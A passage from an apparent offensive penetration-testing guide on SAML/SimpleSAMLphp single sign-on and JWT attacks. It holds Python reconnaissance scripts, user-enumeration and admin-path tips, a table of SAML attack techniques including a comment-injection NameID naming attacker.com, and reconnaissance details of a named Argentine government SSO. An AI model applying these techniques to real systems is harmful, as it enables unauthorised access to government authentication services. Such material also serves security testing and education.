&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;xml.etree.ElementTree&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;ET&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/saml2/idp/metadata.php&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;root &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; ET&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;fromstring(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;content)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ns &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;md&amp;#39;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;urn:oasis:names:tc:SAML:2.0:metadata&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;ds&amp;#39;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;http://www.w3.org/2000/09/xmldsig#&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Entity ID (unique IdP identifier)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;entity_id &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; root&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;entityID&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;Entity ID: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;entity_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# X.509 certificates (signing and encryption)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; key &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; root&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#a6d189"&gt;&amp;#39;.//md:KeyDescriptor&amp;#39;&lt;/span&gt;, ns):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; use &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; key&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;use&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;unspecified&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cert &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; key&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;find(&lt;span style="color:#a6d189"&gt;&amp;#39;.//ds:X509Certificate&amp;#39;&lt;/span&gt;, ns)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; cert &lt;span style="color:#99d1db;font-weight:bold"&gt;is&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;not&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;Cert (&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;use&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;): &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;cert&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text[:&lt;span style="color:#ef9f76"&gt;40&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;...&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SingleSignOnService URL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; sso &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; root&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#a6d189"&gt;&amp;#39;.//md:SingleSignOnService&amp;#39;&lt;/span&gt;, ns):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;SSO URL (&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;sso&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;Binding&amp;#39;&lt;/span&gt;)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;): &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;sso&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;Location&amp;#39;&lt;/span&gt;)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# NameIDFormat&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; fmt &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; root&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#a6d189"&gt;&amp;#39;.//md:NameIDFormat&amp;#39;&lt;/span&gt;, ns):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;NameIDFormat: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;fmt&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Certificate Subject Alternative Names (SANs)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract using OpenSSL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;What to extract from metadata&lt;/strong&gt;:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;Real Example&lt;/th&gt;
&lt;th&gt;Utility&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Entity ID&lt;/td&gt;
&lt;td&gt;&lt;code&gt;urn:x-simplesamlphp:autenticacion-idp&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Unique IdP identifier&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SSO URL&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://sso.gov.ar/module.php/saml/idp/singleSignOnService&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Authentication endpoint&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Certificate&lt;/td&gt;
&lt;td&gt;Sectigo OV RSA 2048&lt;/td&gt;
&lt;td&gt;Check validity, potential XSW&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NameIDFormat&lt;/td&gt;
&lt;td&gt;&lt;code&gt;transient&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;If &lt;code&gt;persistent&lt;/code&gt; → user correlation possible&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SP Entity ID (via AuthnRequest)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;urn:www.orgao.gov.ar&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Service Provider identifier&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4 id="decode-samlrequest-from-url" &gt;
&lt;div&gt;
&lt;a href="#decode-samlrequest-from-url"&gt;
###
&lt;/a&gt;
Decode SAMLRequest from URL
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;When an SP redirects to the IdP, the URL contains a &lt;code&gt;SAMLRequest&lt;/code&gt; parameter (base64 + deflate):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;base64&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;zlib&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;urllib.parse&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract SAMLRequest from redirect URL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;https://SP.TARGET.com/wp-login.php&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; allow_redirects&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;False&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;loc &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;Location&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;samreq &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; urllib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;parse&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;parse_qs(urllib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;parse&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlparse(loc)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;query)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;SAMLRequest&amp;#39;&lt;/span&gt;, [&lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;])[&lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; samreq:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; decoded &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;b64decode(urllib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;parse&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;unquote(samreq))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# SimpleSAMLphp uses deflate compression&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; inflated &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; zlib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decompress(decoded, &lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt;zlib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;MAX_WBITS)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(inflated&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode(&lt;span style="color:#a6d189"&gt;&amp;#39;utf-8&amp;#39;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(decoded&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode(&lt;span style="color:#a6d189"&gt;&amp;#39;utf-8&amp;#39;&lt;/span&gt;, errors&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;replace&amp;#39;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="user-enumeration-via-sso-login" &gt;
&lt;div&gt;
&lt;a href="#user-enumeration-via-sso-login"&gt;
###
&lt;/a&gt;
User Enumeration via SSO Login
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Form-based SSOs often differentiate existing from non-existing users:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify the SSO login endpoint&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Usually: /module.php/core/loginuserpass or /simplesaml/module.php/core/loginuserpass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Test with valid vs invalid user&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Different response (password error vs &amp;#34;user not found&amp;#34;) = user enum&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. SimpleSAMLphp admin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Access /simplesaml/module.php/core/loginuserpass.php?as_admin=1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# May give access to the SimpleSAMLphp admin panel&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="xmlrpc-blocked-by-sso--alternative-reconnaissance" &gt;
&lt;div&gt;
&lt;a href="#xmlrpc-blocked-by-sso--alternative-reconnaissance"&gt;
###
&lt;/a&gt;
XMLRPC Blocked by SSO — Alternative Reconnaissance
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;When a WordPress has SSO, XMLRPC may respond with HTML (SSO login page) instead of XML fault. It&amp;rsquo;s still possible:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Methods WITHOUT authentication still work:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# system.listMethods → lists all 79+ methods&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# system.getCapabilities → XMLRPC version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# demo.sayHello → connectivity test&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# pingback.ping → potential SSRF (even without auth!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Methods that require auth will return SSO HTML:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# wp.getUsers, wp.getPosts, wp.uploadFile → require credentials&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="common-saml-attacks" &gt;
&lt;div&gt;
&lt;a href="#common-saml-attacks"&gt;
###
&lt;/a&gt;
Common SAML Attacks
&lt;/div&gt;
&lt;/h4&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attack&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Test&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;XML Signature Wrapping (XSW)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Modify Assertion while keeping Signature valid (relocate signed element)&lt;/td&gt;
&lt;td&gt;Send modified assertion with original signature&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Signature Stripping&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Completely remove Signature element&lt;/td&gt;
&lt;td&gt;Does server accept unsigned assertion?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Comment Injection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Inject &lt;code&gt;&amp;lt;!-- comment --&amp;gt;&lt;/code&gt; in NameID&lt;/td&gt;
&lt;td&gt;&lt;code&gt;admin@target&amp;lt;!--evil--&amp;gt;@attacker.com&lt;/code&gt; → parser sees &lt;code&gt;admin@target.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Replay Attack&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reuse the same assertion&lt;/td&gt;
&lt;td&gt;Same token accepted twice?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Key Confusion&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Send assertion signed by attacker IdP&lt;/td&gt;
&lt;td&gt;Does SP accept assertion from unauthorized IdP?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audience Restriction Bypass&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Modify Audience&lt;/td&gt;
&lt;td&gt;Does SP accept assertion for different Audience?&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: &lt;code&gt;autenticacion.mpf.gob.ar&lt;/code&gt; — SimpleSAMLphp IdP with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Metadata exposed at &lt;code&gt;/saml2/idp/metadata.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Entity ID: &lt;code&gt;urn:x-simplesamlphp:autenticacion-idp&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Valid Sectigo certificate (Jan 2026-Feb 2027)&lt;/li&gt;
&lt;li&gt;SP: &lt;code&gt;urn:www.mpf.gob.ar&lt;/code&gt; with ACS at &lt;code&gt;https://www.mpf.gob.ar/wp-login.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;NameIDFormat: &lt;code&gt;transient&lt;/code&gt; (does not allow correlation)&lt;/li&gt;
&lt;li&gt;79 XMLRPC methods in WordPress protected by SSO&lt;/li&gt;
&lt;li&gt;Additional subdomains in certificate SAN: &lt;code&gt;fiscales.gob.ar&lt;/code&gt;, &lt;code&gt;fiscales.gov.ar&lt;/code&gt;, &lt;code&gt;mpf.gov.ar&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2 id="16-jwt--complete-attacks" &gt;
&lt;div&gt;
&lt;a href="#16-jwt--complete-attacks"&gt;
#
&lt;/a&gt;
16. JWT — COMPLETE ATTACKS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="161-decode-jwt-without-signature-verification" &gt;
&lt;div&gt;
&lt;a href="#161-decode-jwt-without-signature-verification"&gt;
##
&lt;/a&gt;
16.1 Decode JWT (without signature verification)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# jwt.io or Python:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;import base64, json
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;token&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.xxx&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;def decode_jwt&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;token&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;parts&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; token.split&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;.&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Header&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;h&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; json.loads&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;base64.urlsafe_b64decode&lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;parts&lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt;0&lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; + &lt;span style="color:#a6d189"&gt;&amp;#39;===&amp;#39;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;.decode&lt;span style="color:#99d1db;font-weight:bold"&gt;())&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Payload&lt;/span&gt;
